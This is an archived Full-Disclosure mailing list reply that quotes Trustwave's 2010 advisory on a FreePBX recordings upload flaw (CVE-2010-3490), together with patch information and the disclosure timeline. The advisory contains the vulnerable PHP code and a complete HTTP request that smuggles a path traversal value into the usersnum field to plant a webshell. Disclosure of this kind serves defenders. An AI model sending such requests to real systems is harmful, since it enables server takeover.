lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Tue, 28 Sep 2010 12:41:51 +0000
From: Richard Miles <richard.k.miles@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: TWSL2010-005: FreePBX recordings interface
 allows remote code execution

Hi

Trixbox update module automatically correct the problem?

Thank you

On Thu, Sep 23, 2010 at 9:49 PM, Trustwave Advisories
<trustwaveadvisories@...stwave.com> wrote:
> Trustwave's SpiderLabs Security Advisory TWSL2010-005:
> FreePBX recordings interface allows remote code execution
>
> https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt
>
> Published: 2010-09-23
> Version: 1.0
>
> Vendor: FreePBX (http://www.freepbx.org/)
> Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it
> Version(s) affected: 2.8.0 and below
>
> Product Description:
> FreePBX is an easy to use GUI (graphical user interface) that controls and
> manages Asterisk, the world's most popular open source telephony engine
> software. FreePBX has been developed and hardened by thousands of
> volunteers,has been downloaded over 5,000,000 times, and is utilized in an
> estimated 500,000 active phone systems.
>
> Source: http://www.freepbx.org
> Credit: Wendel G. Henrique of Trustwave's SpiderLabs
>
> CVE: CVE-2010-3490
>
> Finding:
> The configuration interface for FreePBX is prone to a remote arbitrary code
> execution on the system recordings menu. FreePBX doesn't handle file uploads
> in a secure manner, allowing an attacker to manipulate the file extension
> and the beginning of the uploaded file name.
>
> The piece of code below, found in page.recordings.php, illustrates part of
> the recordings upload feature.
>
> /* Code removed to fit better on advisory */
>
> <?php
>  if (isset($_FILES['ivrfile']['tmp_name']) &&
>  is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
>    if (empty($usersnum)) {
>      $dest = "unnumbered-";
>    } else {
>      $dest = "{$usersnum}-";
>    }
>    $suffix = substr(strrchr($_FILES['ivrfile']['name'], "."), 1);
>    $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
>    move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
>    echo "<h6>"._("Successfully uploaded")."
>      ".$_FILES['ivrfile']['name']."</h6>";
>    $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
>  } ?>
>
> /* Code removed to fit better on advisory */
>
> When a file is uploaded, a copy is saved temporarily under the /tmp/
> directory, where the name of the file is composed of
> user-controlled-staticname.extension, where:
>
> "user-controlled" is $usersnum variable.
> "staticname" value is -ivrrecording.
> "extension" is controlled by the user.
>
> If $usersnum variable is not defined, then a static string (unnumbered)
> is used.
>
> Finally, when the user clicks on the save button on the System Recordings
> interface, the file is saved with the original file name provided by the
> user under the /var/lib/asterisk/sounds/custom/ directory.
>
> When uploading a file, an attacker can manipulate the $usersnum variable to
> perform a path traversal attack and save it anyplace that the web server
> user has access, for example the Apache's DocumentRoot. This allows an
> attacker to upload malicious code to the web server and execute it under the
> webserver's access permissions.
>
> The HTTP request below illustrates the upload of a phpshell.
>
> POST /admin/config.php HTTP/1.1
> Host: 10.10.1.3
> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
> en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Proxy-Connection: keep-alive
> Referer: http://10.10.1.3/admin/config.php
> Cookie: ARI=cookieValue; PHPSESSID=cookieValue
> Authorization: Basic base64auth
> Content-Type: multipart/form-data;
> boundary=---------------------------5991806838789183981588991120
> Content-Length: 116089
>
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="display"
>
> recordings
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="action"
>
> recordings_start
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="usersnum"
>
> ../../../../../var/www/html/admin/SpiderLabs
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
> Content-Type: application/octet-stream
>
> <?php
> /* WebShell code goes here */
> ?>
>
> -----------------------------5991806838789183981588991120--
>
> To access the webshell in this example, an attacker would use
> the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecording.php
>
> Maintainer Response:
> The maintainer has released a patch to address this issue for all versions
> of the software 2.3 and newer.
>
> Details of the patch can be found here:
> http://www.freepbx.org/trac/ticket/4553
>
> Remediation Steps:
> Install the maintainer-provided patch.
>
> Vendor Communication Timeline:
> 08/13/10 - Initial contact
> 08/18/10 - Vulnerability disclosed
> 09/16/10 - Initial fix proposed by maintainer
> 09/22/10 - Fix reviewed, improved, and released by maintainer
> 09/23/10 - Advisory public release
>
> Revision History:
> 1.0 Initial publication
>
> About Trustwave:
> Trustwave is the leading provider of on-demand and subscription-based
> information security and payment card industry compliance management
> solutions to businesses and government entities throughout the world. For
> organizations faced with today's challenging data security and compliance
> environment, Trustwave provides a unique approach with comprehensive
> solutions that include its flagship TrustKeeper compliance management
> software and other proprietary security solutions. Trustwave has helped
> thousands of organizations--ranging from Fortune 500 businesses and large
> financial institutions to small and medium-sized retailers--manage
> compliance and secure their network infrastructure, data communications and
> critical information assets. Trustwave is headquartered in Chicago with
> offices throughout North America, South America, Europe, Africa, China and
> Australia. For more information, visit https://www.trustwave.com
>
> About Trustwave's SpiderLabs:
> SpiderLabs is the advance security team at Trustwave responsible for
> incident response and forensics, ethical hacking and application security
> tests for Trustwave's clients. SpiderLabs has responded to hundreds of
> security incidents, performed thousands of ethical hacking exercises and
> tested the security of hundreds of business applications for Fortune 500
> organizations. For more information visit
> https://www.trustwave.com/spiderlabs
>
> Disclaimer:
> The information provided in this advisory is provided "as is" without
> warranty of any kind. Trustwave disclaims all warranties, either express or
> implied, including the warranties of merchantability and fitness for a
> particular purpose. In no event shall Trustwave or its suppliers be liable
> for any damages whatsoever including direct, indirect, incidental,
> consequential, loss of business profits or special damages, even if
> Trustwave or its suppliers have been advised of the possibility of such
> damages. Some states do not allow the exclusion or limitation of liability
> for consequential or incidental damages so the foregoing limitation may not
> apply.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ